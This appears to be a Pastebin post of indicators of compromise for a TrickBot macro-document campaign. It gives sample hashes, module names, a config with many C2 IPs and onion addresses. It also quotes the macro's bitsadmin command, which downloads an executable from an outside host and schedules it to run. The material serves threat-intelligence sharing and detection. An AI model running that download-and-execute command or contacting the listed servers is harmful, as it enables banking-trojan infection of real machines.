Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #trickbot "Critical Notice: Statement of Liabilities" shared by Racoo
- Macro enabled doc Statement.doc > https://beta.virusbay.io/sample/browse/6f07f7104add44b4ef8393e99ecda633
- runs : cmd.exe /c bitsadmin /transfer msd5 /priority foreground http://onyx-tools.com/public.png %TEMP%/cCTypiwOC.exe &schtasks /create /st 14:49 /sc once /tn srx3 /tr %TEMP%/cCTypiwOC.exe
- Drops : public.png : 00e5e57d672145f33b866b37ec714c0078f3ad2e9e9eab6f284df2af7784d4bf
- https://app.any.run/tasks/c9b085d8-7747-4e6a-b2eb-49a0cfff7798
- Installation dir > Roaming\vcmsd
- Modules
- 00e5e57d672145f33b866b37ec714c0078f3ad2e9e9eab6f284df2af7784d4bf ./cDTypiwOD.exe
- f0eee12966ca8156ef9483304b6a018e0130e414fe83242e02e7c79526907c36 ./info.dat
- bbb018456a06339dd74c8c1bdc90ad880af731bcefa152584340b2e4fd8c9b8d ./FAQ
- 38955b875a8d00cce78dcf823ed35091fb6f07e5bf3c3638e9abf1feadf5fe18 ./README.md
- 2bab8ba30719a42213db0087572e481f14de7cdf7bffe1a1be17db9f09d70525 ./Modules/networkDll32
- 70dccaa8296d3101e33f952eb2a927a21f428786f1f8db724eaf918408e348cf ./Modules/systeminfo32
- 18c9e21685ab93786ffe5d2046526419057ee315551695186caedfc1189d25b5 ./Modules/injectDll32
- 3a6b6777fef3a63f5d140be36abe76d28eb3251ecd6da1a50eb9d4c92e64aad4 ./Modules/networkDll32_configs/dpost
- c84da3e052b1d0efd8d1bfbde2c48d05bbe6ad5435fd12b7749ca724a9a11439 ./Modules/injectDll32_configs/dinj
- edb17b2f4e39f45022597a80b3d9f8e64283d8e6103ed80973f243903a9502ef ./Modules/injectDll32_configs/sinj
- 3a6b6777fef3a63f5d140be36abe76d28eb3251ecd6da1a50eb9d4c92e64aad4 ./Modules/injectDll32_configs/dpost
- <mcconf>
- <ver>1000245</ver>
- <gtag>ser0813</gtag>
- <servs><srv>185.106.162.4:443</srv>
- <srv>85.9.212.117:443</srv>
- <srv>82.164.118.12:443</srv>
- <srv>198.53.63.120:443</srv>
- <srv>158.58.131.54:443</srv>
- <srv>185.106.162.9:449</srv>
- <srv>118.200.151.113:443</srv>
- <srv>36.67.215.93:449</srv>
- <srv>41.211.9.234:449</srv>
- <srv>178.78.202.189:443</srv>
- <srv>185.106.162.89:449</srv>
- <srv>212.225.214.249:449</srv>
- <srv>68.169.161.5:443</srv>
- <srv>148.66.40.98:443</srv>
- <srv>103.205.112.58:443</srv>
- <srv>182.253.210.130:449</srv>
- <srv>47.49.168.50:443</srv>
- <srv>70.79.178.120:449</srv>
- <srv>68.109.83.22:443</srv>
- <srv>176.10.170.65:443</srv>
- <srv>84.237.228.13:443</srv>
- <srv>96.43.40.221:443</srv>
- <srv>195.133.145.121:443</srv>
- <srv>92.53.67.154:443</srv>
- <srv>91.235.128.139:443</srv>
- <srv>109.234.39.194:443</srv>
- <srv>83.220.168.185:443</srv>
- <srv>37.230.116.52:443</srv>
- <srv>78.155.207.102:443</srv></servs>
- <autorun>
- <module name="systeminfo" ctl="GetSystemInfo"/>
- <module name="injectDll"/>
- </autorun>
- </mcconf>
- POST
- https://109.234.38.201:447/ser0813/USERNAME-PC_W617601.3D5D4D47640CB0626DF2AA7B550228C5/5/systeminfo32/
- 0x287b1c, 88, <ssert>
- <expir>1546214400</expir>
- </ssert>
- 3gihg5esw7lxg2wh.onion:448
- 185.251.39.124:447:447
- 46.21.248.207:447
- 109.234.38.201:447 185.251.38.104:447
- 95.213.204.86:447
- gihg5esw7lxg2wh.onion:448
- cgihg5esw7lxg2wh.onion:448
Add Comment
Please, Sign In to add comment